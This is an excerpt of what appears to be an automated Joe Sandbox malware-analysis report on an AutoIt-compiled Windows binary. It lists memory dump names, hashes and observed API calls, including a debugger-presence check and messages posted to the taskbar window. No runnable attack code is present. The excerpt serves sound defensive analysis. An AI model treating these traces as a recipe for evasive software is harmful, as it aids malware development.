                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 776a2f64603bad36f6b7e9e4b39d9941b9e121e54798e1a5d439f1e2d22723d7
                                        • Instruction ID: 0320a4393e63b9c5b8fcc980420cca1f4e6b2bfc7aa28a64dae887bf35032bfc
                                        • Opcode Fuzzy Hash: 776a2f64603bad36f6b7e9e4b39d9941b9e121e54798e1a5d439f1e2d22723d7
                                        • Instruction Fuzzy Hash: C5F0A475A5121867DB05EBA5CC96BFE77B8EB01391F080915FD22A32C1EA706A4C8268
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: 3, 3, 16, 1
                                        • API String ID: 176396367-3042988571
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C50B23
                                        Strings
                                        Similarity
                                        • API ID: Message
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 2030045667-4017498283
                                        APIs
                                          • Part of subcall function 00C0F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C10D71,?,?,?,00BF100A), ref: 00C0F7CE
                                        • IsDebuggerPresent.KERNEL32(?,?,?,00BF100A), ref: 00C10D75
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BF100A), ref: 00C10D84
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C10D7F
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 55579361-631824599
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: %.3d$X64
                                        • API String ID: 481472006-1077770165
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C8236C
                                        • PostMessageW.USER32(00000000), ref: 00C82373
                                          • Part of subcall function 00C5E97B: Sleep.KERNEL32 ref: 00C5E9F3
                                        Strings
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C8232C
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C8233F
                                          • Part of subcall function 00C5E97B: Sleep.KERNEL32 ref: 00C5E9F3
                                        Strings
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C2BE93
                                        • GetLastError.KERNEL32 ref: 00C2BEA1
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C2BEFC
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0